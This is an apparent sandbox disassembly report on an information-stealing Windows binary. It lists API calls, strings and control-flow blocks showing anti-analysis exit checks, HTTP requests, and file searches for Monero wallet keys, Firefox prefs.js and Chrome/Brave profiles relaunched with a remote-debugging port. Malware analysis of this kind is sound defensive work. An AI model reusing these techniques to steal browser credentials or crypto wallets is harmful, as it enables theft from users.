                                          • Part of subcall function 004E1220: __aulldiv.LIBCMT ref: 004E1258
                                          • Part of subcall function 004E1220: __aulldiv.LIBCMT ref: 004E1266
                                          • Part of subcall function 004E1220: ExitProcess.KERNEL32 ref: 004E1294
                                          • Part of subcall function 004F6A10: GetUserDefaultLangID.KERNEL32 ref: 004F6A14
                                          • Part of subcall function 004E1190: ExitProcess.KERNEL32 ref: 004E11C6
                                          • Part of subcall function 004F79E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004E11B7), ref: 004F7A10
                                          • Part of subcall function 004F79E0: RtlAllocateHeap.NTDLL(00000000), ref: 004F7A17
                                          • Part of subcall function 004F79E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 004F7A2F
                                          • Part of subcall function 004F7A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004F7AA0
                                          • Part of subcall function 004F7A70: RtlAllocateHeap.NTDLL(00000000), ref: 004F7AA7
                                          • Part of subcall function 004F7A70: GetComputerNameA.KERNEL32(?,00000104), ref: 004F7ABF
                                          • Part of subcall function 004FACC0: lstrlen.KERNEL32(?,01458FB0,?,\Monero\wallet.keys,00500E1A), ref: 004FACD5
                                          • Part of subcall function 004FACC0: lstrcpy.KERNEL32(00000000), ref: 004FAD14
                                          • Part of subcall function 004FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004FAD22
                                          • Part of subcall function 004FABB0: lstrcpy.KERNEL32(?,00500E1A), ref: 004FAC15
                                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01459130,?,005010F4,?,00000000,?,005010F8,?,00000000,00500AF3), ref: 004F6D6A
                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004F6D88
                                        • CloseHandle.KERNEL32(00000000), ref: 004F6D99
                                        • Sleep.KERNEL32(00001770), ref: 004F6DA4
                                        • CloseHandle.KERNEL32(?,00000000,?,01459130,?,005010F4,?,00000000,?,005010F8,?,00000000,00500AF3), ref: 004F6DBA
                                        • ExitProcess.KERNEL32 ref: 004F6DC2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                        • String ID:
                                        • API String ID: 2525456742-0
                                        • Opcode ID: cf548abfbf47af6e0080beb81f26d5318190af3567bc217d24e71be74eeb4cf5
                                        • Instruction ID: 50fa25dff04b7278d9edade752e36f0def95a97dbe6e324aa27de2d4ac1877b7
                                        • Opcode Fuzzy Hash: cf548abfbf47af6e0080beb81f26d5318190af3567bc217d24e71be74eeb4cf5
                                        • Instruction Fuzzy Hash: 0F3129B0A4410CABCB04FBA2DC56BFE7739AF44305F00491EF31666192DF786A05C66A

                                        Control-flow Graph (basic blocks with address range, calls, and successor edges)

                                        • Block 1436 (4e1220-4e1247): call 4f8b40, GlobalMemoryStatusEx -> 1439, 1440
                                        • Block 1439 (4e1249-4e1271): call 4fdd30 (x2) -> 1442
                                        • Block 1440 (4e1273-4e127a) -> 1442
                                        • Block 1442 (4e1281-4e1285) -> 1444, 1445
                                        • Block 1444 (4e129a-4e129d): function exit
                                        • Block 1445 (4e1287) -> 1447, 1448
                                        • Block 1447 (4e1289-4e1290) -> 1444, 1448
                                        • Block 1448 (4e1292-4e1294): ExitProcess
                                        APIs
                                        • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004E123E
                                        • __aulldiv.LIBCMT ref: 004E1258
                                        • __aulldiv.LIBCMT ref: 004E1266
                                        • ExitProcess.KERNEL32 ref: 004E1294
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                        • String ID: @
                                        • API String ID: 3404098578-2766056989
                                        • Opcode ID: ba36cf47b9ceba44e64d82a6350c98d8d7e5dacb9cfcbdaf8459463678c2d800
                                        • Instruction ID: 6b8c5bf020d3ea78423040284136f2eb0d912fdf12cbc937951b4211d42fd413
                                        • Opcode Fuzzy Hash: ba36cf47b9ceba44e64d82a6350c98d8d7e5dacb9cfcbdaf8459463678c2d800
                                        • Instruction Fuzzy Hash: 54016DB0D80348BAEF10DFE5DC4ABAEBB78AB54706F20848AF704BA2D0C67C5541875D

                                        Control-flow Graph (basic blocks with address range, calls, and successor edges)

                                        • Block 1450 (4f6d93) -> 1451
                                        • Block 1451 (4f6daa) -> 1453, 1454
                                        • Block 1453 (4f6dac-4f6dc2): call 4f6bc0, call 4f5d60, CloseHandle, ExitProcess
                                        • Block 1454 (4f6d5a-4f6d77): call 4fade0, OpenEventA -> 1459, 1460
                                        • Block 1459 (4f6d79-4f6d91): call 4fade0, CreateEventA -> 1453
                                        • Block 1460 (4f6d95-4f6da4): CloseHandle, Sleep -> 1451
                                        APIs
                                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01459130,?,005010F4,?,00000000,?,005010F8,?,00000000,00500AF3), ref: 004F6D6A
                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004F6D88
                                        • CloseHandle.KERNEL32(00000000), ref: 004F6D99
                                        • Sleep.KERNEL32(00001770), ref: 004F6DA4
                                        • CloseHandle.KERNEL32(?,00000000,?,01459130,?,005010F4,?,00000000,?,005010F8,?,00000000,00500AF3), ref: 004F6DBA
                                        • ExitProcess.KERNEL32 ref: 004F6DC2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                        • String ID:
                                        • API String ID: 941982115-0
                                        • Opcode ID: f53bcbbd507aa0a0d3b6496aa7458fbdc98678c970358bbb8f03fd94049afec2
                                        • Instruction ID: 3bbee9ce3e1700dbad8b6a19398fb3a65319fd9c4bf88c9e67c65d49d6998b10
                                        • Opcode Fuzzy Hash: f53bcbbd507aa0a0d3b6496aa7458fbdc98678c970358bbb8f03fd94049afec2
                                        • Instruction Fuzzy Hash: CBF05E70A4820DABEB04ABA0DC4ABBE3774AF84745F11861AB712A5191CBB85501CA6E

                                        Control-flow Graph

                                        APIs
                                        • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004E4889
                                        • InternetCrackUrlA.WININET(00000000,00000000), ref: 004E4899
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CrackInternetlstrlen
                                        • String ID: <
                                        • API String ID: 1274457161-4251816714
                                        • Opcode ID: 3a703bb3e4b245ae276f54db15642b8340fb5db05ba3f30aabbb3ed0beab0a77
                                        • Instruction ID: 444dcad7e38988f3c01be72451d0a302bfd6f0482484ea3dfbe101704eb56690
                                        • Opcode Fuzzy Hash: 3a703bb3e4b245ae276f54db15642b8340fb5db05ba3f30aabbb3ed0beab0a77
                                        • Instruction Fuzzy Hash: 0C2150B1D0020CABDF14DFA5E845BDD7775FB44310F108629F619A72C0DB746A05CB91

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 004FAAB0: lstrcpy.KERNEL32(?,00000000), ref: 004FAAF6
                                          • Part of subcall function 004E62D0: InternetOpenA.WININET(00500DFF,00000001,00000000,00000000,00000000), ref: 004E6331
                                          • Part of subcall function 004E62D0: StrCmpCA.SHLWAPI(?,0145E888), ref: 004E6353
                                          • Part of subcall function 004E62D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004E6385
                                          • Part of subcall function 004E62D0: HttpOpenRequestA.WININET(00000000,GET,?,0145E208,00000000,00000000,00400100,00000000), ref: 004E63D5
                                          • Part of subcall function 004E62D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004E640F
                                          • Part of subcall function 004E62D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004E6421
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004F5478
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                        • String ID: ERROR$ERROR
                                        • API String ID: 3287882509-2579291623
                                        • Opcode ID: 39f2bb2082598720f917f028f9b03129cf433bfa91896686081a4fc241122a96
                                        • Instruction ID: f47ef9c405a04818c9b871237be077a7dae47cddbb9e083648904a3c7624b8a5
                                        • Opcode Fuzzy Hash: 39f2bb2082598720f917f028f9b03129cf433bfa91896686081a4fc241122a96
                                        • Instruction Fuzzy Hash: EA114F7090010CABCB14FF65D996AFD3339AF10344F40455DEB0E46492EB38AB18C65A
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004F7AA0
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 004F7AA7
                                        • GetComputerNameA.KERNEL32(?,00000104), ref: 004F7ABF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateComputerNameProcess
                                        • String ID:
                                        • API String ID: 1664310425-0
                                        • Opcode ID: 05535e6418eb6fd9bde163d12b814b9129f2282e1559b85a5f597dbcff0927a5
                                        • Instruction ID: ddca3441d69bf0c1762193d1acbcb12834a5c3ca122d864c31d42da08de27a9d
                                        • Opcode Fuzzy Hash: 05535e6418eb6fd9bde163d12b814b9129f2282e1559b85a5f597dbcff0927a5
                                        • Instruction Fuzzy Hash: F3016DB1A08249ABCB04CF98DD45FAEBBB8FB44711F10421AF605E2280D7B85A00CBA5
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 004E112B
                                        • VirtualAllocExNuma.KERNEL32(00000000), ref: 004E1132
                                        • ExitProcess.KERNEL32 ref: 004E1143
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process$AllocCurrentExitNumaVirtual
                                        • String ID:
                                        • API String ID: 1103761159-0
                                        • Opcode ID: a025fcfcdefb3832c16916275a1b6d525b07fb48025cc5b62a9660b513f9d6db
                                        • Instruction ID: f4fcc59eb153109b680c0d93bad169065052fe92db05a8efb994134d0ecf9162
                                        • Opcode Fuzzy Hash: a025fcfcdefb3832c16916275a1b6d525b07fb48025cc5b62a9660b513f9d6db
                                        • Instruction Fuzzy Hash: 8CE0867098930CFBE7145B919C0AF4D7678AB44B16F104155F7097A1D0C6B82640865C
                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 004E10B3
                                        • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 004E10F7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$AllocFree
                                        • String ID:
                                        • API String ID: 2087232378-0
                                        • Opcode ID: 2327276f05da13a2a4560b10a64f6afa4a20b974823742c1620f7d5dbc0a639e
                                        • Instruction ID: 6068a235b875d8290a7c21fbfab098534bb135b598a21a63edf295987e100b6f
                                        • Opcode Fuzzy Hash: 2327276f05da13a2a4560b10a64f6afa4a20b974823742c1620f7d5dbc0a639e
                                        • Instruction Fuzzy Hash: 4AF0E2B1681208BBE7189AA9AC59FAFB7ACE705B05F304549F500E7290D575AE00CAA8
                                        APIs
                                          • Part of subcall function 004F7A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004F7AA0
                                          • Part of subcall function 004F7A70: RtlAllocateHeap.NTDLL(00000000), ref: 004F7AA7
                                          • Part of subcall function 004F7A70: GetComputerNameA.KERNEL32(?,00000104), ref: 004F7ABF
                                          • Part of subcall function 004F79E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004E11B7), ref: 004F7A10
                                          • Part of subcall function 004F79E0: RtlAllocateHeap.NTDLL(00000000), ref: 004F7A17
                                          • Part of subcall function 004F79E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 004F7A2F
                                        • ExitProcess.KERNEL32 ref: 004E11C6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$Process$AllocateName$ComputerExitUser
                                        • String ID:
                                        • API String ID: 3550813701-0
                                        • Opcode ID: ae04e342b0de08a4e17861be8d67bc8f5a90f4c68cc4cb79929145785f2002aa
                                        • Instruction ID: ced878887e3c6f7ee5082c3223cec2c210ee161f194cccc64949cc66583a95ee
                                        • Opcode Fuzzy Hash: ae04e342b0de08a4e17861be8d67bc8f5a90f4c68cc4cb79929145785f2002aa
                                        • Instruction Fuzzy Hash: 67E0E2B594824956DA1873B6AC06F3B328C5B6920FF04496EFB0896252EA2DF811827D
                                        APIs
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                          • Part of subcall function 004FAC30: lstrcpy.KERNEL32(00000000,?), ref: 004FAC82
                                          • Part of subcall function 004FAC30: lstrcat.KERNEL32(00000000), ref: 004FAC92
                                          • Part of subcall function 004FACC0: lstrlen.KERNEL32(?,01458FB0,?,\Monero\wallet.keys,00500E1A), ref: 004FACD5
                                          • Part of subcall function 004FACC0: lstrcpy.KERNEL32(00000000), ref: 004FAD14
                                          • Part of subcall function 004FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004FAD22
                                          • Part of subcall function 004FABB0: lstrcpy.KERNEL32(?,00500E1A), ref: 004FAC15
                                        • FindFirstFileA.KERNEL32(00000000,?,00500B32,00500B2F,00000000,?,?,?,00501450,00500B2E), ref: 004EBEC5
                                        • StrCmpCA.SHLWAPI(?,00501454), ref: 004EBF33
                                        • StrCmpCA.SHLWAPI(?,00501458), ref: 004EBF49
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 004EC8A9
                                        • FindClose.KERNEL32(000000FF), ref: 004EC8BB
                                        Strings
                                        • Google Chrome, xrefs: 004EC6F8
                                        • --remote-debugging-port=9229 --profile-directory=", xrefs: 004EC495
                                        • Brave, xrefs: 004EC0E8
                                        • \Brave\Preferences, xrefs: 004EC1C1
                                        • --remote-debugging-port=9229 --profile-directory=", xrefs: 004EC3B2
                                        • Preferences, xrefs: 004EC104
                                        • --remote-debugging-port=9229 --profile-directory=", xrefs: 004EC534
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                        • String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
                                        • API String ID: 3334442632-1869280968
                                        • Opcode ID: f3a1806224ebecd6682cc353c93daf4c847ab62edd050bf32c5915f9faf598ce
                                        • Instruction ID: c04c2f83ffc9ca7d942e5593adb9d400821e2a0143f99fbebb3eb067bf2c3872
                                        • Opcode Fuzzy Hash: f3a1806224ebecd6682cc353c93daf4c847ab62edd050bf32c5915f9faf598ce
                                        • Instruction Fuzzy Hash: 825254B290014C5BCB14FB61DD96EFE733DAF44305F40459EB60A66091EE386B58CF6A
                                        APIs
                                        • wsprintfA.USER32 ref: 004F3B1C
                                        • FindFirstFileA.KERNEL32(?,?), ref: 004F3B33
                                        • lstrcat.KERNEL32(?,?), ref: 004F3B85
                                        • StrCmpCA.SHLWAPI(?,00500F58), ref: 004F3B97
                                        • StrCmpCA.SHLWAPI(?,00500F5C), ref: 004F3BAD
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 004F3EB7
                                        • FindClose.KERNEL32(000000FF), ref: 004F3ECC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                        • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                        • API String ID: 1125553467-2524465048
                                        • Opcode ID: e19a1157067973a31b11ec7c77f8d790aa18338b15cb8cba5b9366873d6dcf99
                                        • Instruction ID: e6ae1bd77531acad72955ebf8b82b62997d6fdd2c425f6dbcb618970a187aa2e
                                        • Opcode Fuzzy Hash: e19a1157067973a31b11ec7c77f8d790aa18338b15cb8cba5b9366873d6dcf99
                                        • Instruction Fuzzy Hash: 7CA11E71A0020C9BDB24DF64DC85FFE7379BB84705F048699B60D96181DB78AB84CF65
                                        APIs
                                        • wsprintfA.USER32 ref: 004F4B7C
                                        • FindFirstFileA.KERNEL32(?,?), ref: 004F4B93
                                        • StrCmpCA.SHLWAPI(?,00500FC4), ref: 004F4BC1
                                        • StrCmpCA.SHLWAPI(?,00500FC8), ref: 004F4BD7
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 004F4DCD
                                        • FindClose.KERNEL32(000000FF), ref: 004F4DE2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextwsprintf
                                        • String ID: %s\%s$%s\%s$%s\*
                                        • API String ID: 180737720-445461498
                                        • Opcode ID: 90a3858b4a05e25cd097cbd8be52bcf9071919a0a955ea6c5b254280817d0380
                                        • Instruction ID: 3e3ce3a695cf97553953a291ad3d42b1377cda8775f22b71744d318983fffbb8
                                        • Opcode Fuzzy Hash: 90a3858b4a05e25cd097cbd8be52bcf9071919a0a955ea6c5b254280817d0380
                                        • Instruction Fuzzy Hash: B661477190421DABCB24EBA4DC45FEE777CBB88701F00868DF60996191EE74AB84CF95
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 004F47D0
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 004F47D7
                                        • wsprintfA.USER32 ref: 004F47F6
                                        • FindFirstFileA.KERNEL32(?,?), ref: 004F480D
                                        • StrCmpCA.SHLWAPI(?,00500FAC), ref: 004F483B
                                        • StrCmpCA.SHLWAPI(?,00500FB0), ref: 004F4851
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 004F48DB
                                        • FindClose.KERNEL32(000000FF), ref: 004F48F0
                                        • lstrcat.KERNEL32(?,0145E758), ref: 004F4915
                                        • lstrcat.KERNEL32(?,0145DBA0), ref: 004F4928
                                        • lstrlen.KERNEL32(?), ref: 004F4935
                                        • lstrlen.KERNEL32(?), ref: 004F4946
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                        • String ID: %s\%s$%s\*
                                        • API String ID: 671575355-2848263008
                                        • Opcode ID: 939984fd271ebc65f613e81f6b1ce0c4403be26da325d80cd6e3383ed777b7cc
                                        • Instruction ID: 0393f1fd1dbdea359b4f7ef1e1e788ca54df5b2e1b874d2bfa03a7e54119a1bd
                                        • Opcode Fuzzy Hash: 939984fd271ebc65f613e81f6b1ce0c4403be26da325d80cd6e3383ed777b7cc
                                        • Instruction Fuzzy Hash: 435157B154421CABCB24EB74DC89FEE777CAB98300F008689B60996190DE789B84CF65
                                        APIs
                                        • wsprintfA.USER32 ref: 004F4113
                                        • FindFirstFileA.KERNEL32(?,?), ref: 004F412A
                                        • StrCmpCA.SHLWAPI(?,00500F94), ref: 004F4158
                                        • StrCmpCA.SHLWAPI(?,00500F98), ref: 004F416E
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 004F42BC
                                        • FindClose.KERNEL32(000000FF), ref: 004F42D1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextwsprintf
                                        • String ID: %s\%s
                                        • API String ID: 180737720-4073750446
                                        • Opcode ID: ad8c4412ce33412f13cbc3b2db448778c657dc21823abc84b89b210211742642
                                        • Instruction ID: 16ec57518e5b7b157e78eba0990677c2335fdbe35370df368e2c2003dd5bde35
                                        • Opcode Fuzzy Hash: ad8c4412ce33412f13cbc3b2db448778c657dc21823abc84b89b210211742642
                                        • Instruction Fuzzy Hash: B45136B190411CABCB24EB60DD45FEA737CBB94304F00869DB61996090DB79AA85CF58
                                        APIs
                                        • wsprintfA.USER32 ref: 004EEE3E
                                        • FindFirstFileA.KERNEL32(?,?), ref: 004EEE55
                                        • StrCmpCA.SHLWAPI(?,00501630), ref: 004EEEAB
                                        • StrCmpCA.SHLWAPI(?,00501634), ref: 004EEEC1
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 004EF3AE
                                        • FindClose.KERNEL32(000000FF), ref: 004EF3C3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextwsprintf
                                        • String ID: %s\*.*
                                        • API String ID: 180737720-1013718255
                                        • Opcode ID: b5025b9e1755e40934b6ca22dcc96745e447bf7c94a4a740c9e4bcfefb6c165d
                                        • Instruction ID: e4045313edbef8636934fc5cbdfb2ff8801be125b26db17114bf26f3447b3812
                                        • Opcode Fuzzy Hash: b5025b9e1755e40934b6ca22dcc96745e447bf7c94a4a740c9e4bcfefb6c165d
                                        • Instruction Fuzzy Hash: 6DE132B291111C9ADB14EB61CC66EFE7339AF50304F4045DEB60E62092EF386B99CF59
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3$nd 32-by$te k$te k$te k$te knd 3expand 32-by
                                        • API String ID: 0-1562099544
                                        • Opcode ID: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                        • Instruction ID: 68cf9c4fe141c221cf4d4ff4d5f357fc77331dfa7f59e6dd868f91c46cc70064
                                        • Opcode Fuzzy Hash: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                        • Instruction Fuzzy Hash: EFE276B09083808FD7A4CF29C580B8BFBE1BFC8354F51892EE99997211D770A959CF56
                                        APIs
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                          • Part of subcall function 004FAC30: lstrcpy.KERNEL32(00000000,?), ref: 004FAC82
                                          • Part of subcall function 004FAC30: lstrcat.KERNEL32(00000000), ref: 004FAC92
                                          • Part of subcall function 004FACC0: lstrlen.KERNEL32(?,01458FB0,?,\Monero\wallet.keys,00500E1A), ref: 004FACD5
                                          • Part of subcall function 004FACC0: lstrcpy.KERNEL32(00000000), ref: 004FAD14
                                          • Part of subcall function 004FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004FAD22
                                          • Part of subcall function 004FABB0: lstrcpy.KERNEL32(?,00500E1A), ref: 004FAC15
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,005016B0,00500D97), ref: 004EF81E
                                        • StrCmpCA.SHLWAPI(?,005016B4), ref: 004EF86F
                                        • StrCmpCA.SHLWAPI(?,005016B8), ref: 004EF885
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 004EFBB1
                                        • FindClose.KERNEL32(000000FF), ref: 004EFBC3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                        • String ID: prefs.js
                                        • API String ID: 3334442632-3783873740
                                        • Opcode ID: f00c3f7e4d4c7db4cc4b679e506939448a493d06646a5316cc1c012cdc0e58c3
                                        • Instruction ID: bc750cafbb92ffdd38e1e78ab40a498d8ebf6643935becd558c2c1fc1c5da353
                                        • Opcode Fuzzy Hash: f00c3f7e4d4c7db4cc4b679e506939448a493d06646a5316cc1c012cdc0e58c3
                                        • Instruction Fuzzy Hash: 43B162B19001089BCB24EF61DD95FFE7379AF54304F0085AEA60E56191EF386B58CB9A
                                        APIs
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0050523C,?,?,?,005052E4,?,?,00000000,?,00000000), ref: 004E1963
                                        • StrCmpCA.SHLWAPI(?,0050538C), ref: 004E19B3
                                        • StrCmpCA.SHLWAPI(?,00505434), ref: 004E19C9
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 004E1D80
                                        • DeleteFileA.KERNEL32(00000000), ref: 004E1E0A
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 004E1E60
                                        • FindClose.KERNEL32(000000FF), ref: 004E1E72
                                          • Part of subcall function 004FAC30: lstrcpy.KERNEL32(00000000,?), ref: 004FAC82
